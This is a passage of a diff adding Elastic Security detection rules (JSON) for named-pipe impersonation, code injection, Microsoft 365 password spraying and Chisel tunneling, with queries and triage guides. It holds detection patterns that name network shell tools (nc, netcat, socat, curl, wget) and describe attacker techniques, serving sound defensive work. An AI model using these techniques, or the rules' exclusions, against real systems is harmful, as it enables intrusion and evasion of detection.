user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"Cmd.Exe\", \"PowerShell.EXE\") or ?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\")) and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "references": [ + "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", + "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", + "https://redcanary.com/blog/getsystem-offsec/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_110.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_110.json new file mode 100644 index 00000000000..84f053ec7ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_110.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via named pipe impersonation. An adversary may abuse this technique by utilizing a framework such Metasploit's meterpreter getsystem command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Named Pipe Impersonation", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"Cmd.Exe\", \"PowerShell.EXE\") or ?process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\")) and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "references": [ + "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", + "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", + "https://redcanary.com/blog/getsystem-offsec/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208.json b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208.json new file mode 100644 index 00000000000..901de40cbb5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a process is created and immediately accessed from an unknown memory code region and by the same parent process. This may indicate a code injection attempt.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Creation CallTrace", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Creation CallTrace\n\nAttackers may inject code into child processes' memory to hide their actual activity, evade detection mechanisms, and decrease discoverability during forensics. This rule looks for a spawned process by Microsoft Office, scripting, and command line applications, followed by a process access event for an unknown memory region by the parent process, which can indicate a code injection attempt.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Create a memory dump of the child process for analysis.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"windows\" and event.code == \"1\" and\n /* sysmon process creation */\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\", \"fltldr.exe\",\n \"mspub.exe\", \"msaccess.exe\",\"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") and\n\n /* noisy FP patterns */\n not (process.parent.name : \"EXCEL.EXE\" and process.executable : \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\ADDINS\\\\*.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\splwow64.exe\" and process.args in (\"8192\", \"12288\") and process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"rundll32.exe\" and process.parent.args : (\"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\", \"--no-sandbox\")) and\n not (process.executable :\n (\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\DWWIN.EXE\") and\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\")) and\n not (process.parent.name : \"regsvr32.exe\" and process.parent.args : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ] by process.parent.entity_id, process.entity_id\n [process where host.os.type == \"windows\" and event.code == \"10\" and\n /* Sysmon process access event from unknown module */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"] by process.entity_id, winlog.event_data.TargetProcessGUID\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetProcessGUID", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3ed032b2-45d8-4406-bc79-7ad1eabb2c72", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "type": "eql", + "version": 208 + }, + "id": "3ed032b2-45d8-4406-bc79-7ad1eabb2c72_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_104.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_104.json new file mode 100644 index 00000000000..8c475b5aec5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_104.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Password Spraying of Microsoft 365 User Accounts", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "source.ip" + ], + "value": 25 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 104 + }, + "id": "3efee4f0-182a-40a8-a835-102c68a4175d_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_106.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_106.json new file mode 100644 index 00000000000..00bab701390 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_106.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Password Spraying of Microsoft 365 User Accounts", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "source.ip" + ], + "value": 25 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 106 + }, + "id": "3efee4f0-182a-40a8-a835-102c68a4175d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_207.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_207.json new file mode 100644 index 00000000000..47d80390709 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_207.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Password Spraying of Microsoft 365 User Accounts", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "source.ip" + ], + "value": 25 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 207 + }, + "id": "3efee4f0-182a-40a8-a835-102c68a4175d_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5.json new file mode 100644 index 00000000000..58320c817f2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Chisel Client", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Chisel Client\n\nAttackers can leverage `chisel` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for a sequence of command line arguments that are consistent with `chisel` client tunneling behavior, followed by a network event by an uncommon process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": 